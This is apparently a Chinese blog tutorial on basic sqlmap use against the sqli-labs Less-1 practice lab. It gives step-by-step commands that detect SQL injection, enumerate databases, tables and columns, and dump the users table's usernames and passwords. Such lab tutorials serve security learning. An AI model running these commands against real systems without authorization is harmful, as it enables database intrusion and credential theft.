SQLMAP简单使用

      SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,Microsoft  SQL  Server,Microsoft Acess,IBM DB2,SQLLite,Firebird,Sybase和SAP MaxDB……SQLmap采用几种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,对查询和盲注。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。

工具/原料

  • sqli-labs https://jingyan.baidu.com/article/67662997a0527d54d51b84df.html
  • sqlmap

方法/步骤

  1. 以sqli-labs第一关进行测试,使用phpstudy和sqli-labs搭建注入平台,可见工具搭建方法,打开第一关系统正常运行如下。
  2. 打开sqlmap输入Python sqlmap.py -u “http://10.10.10.1/sqli-labs-master/Less-1/?id=1” (-u参数指定目标注入地址)检测出存在可利用漏洞。
  3. 使用sqlmap注入获取数据库,Python sqlmap.py -u “http://10.10.10.1/sqli-labs-master/Less-1/?id=1”  –dbs 列取数据库的所有库。如图查询到所有库的名称。
  4. 列出当前数据库使用参数–current-db输入命令。Python sqlmap.py -u “http://10.10.10.1/sqli-labs-master/Less-1/?id=1” –current-db,如下图查询出当前库为security。
  5. 查询security库中存在的所有表,Python sqlmap.py -u “http://10.10.10.1/sqli-labs-master/Less-1/?id=1” -D security –tables如下图查询出四个表。
  6. 列出security库中users表中的所有列,Python sqlmap.py -u “http://10.10.10.1/sqli-labs-master/Less-1/?id=1” -D security -T users –columns(-D dbname指定数据库名称、-T tablename:指定某数据表的名称、–columns:列出指定表上的所有列)。
  7. 导出三个数据列中所有的数据:Python2 sqlmap.py -u “http://10.10.10.1/sqli-labs-master/Less-1/?id=1” -D security -T users -C id,username,password –dump (-D dbname:指定数据库名称、-T tablename:指定某数据表名称、-C Cnmme:指定列名、–dump:导出列里面的字段)。步骤阅读END

发表评论

电子邮件地址不会被公开。 必填项已用*标注

相关文章

开始在上面输入您的搜索词,然后按回车进行搜索。按ESC取消。

返回顶部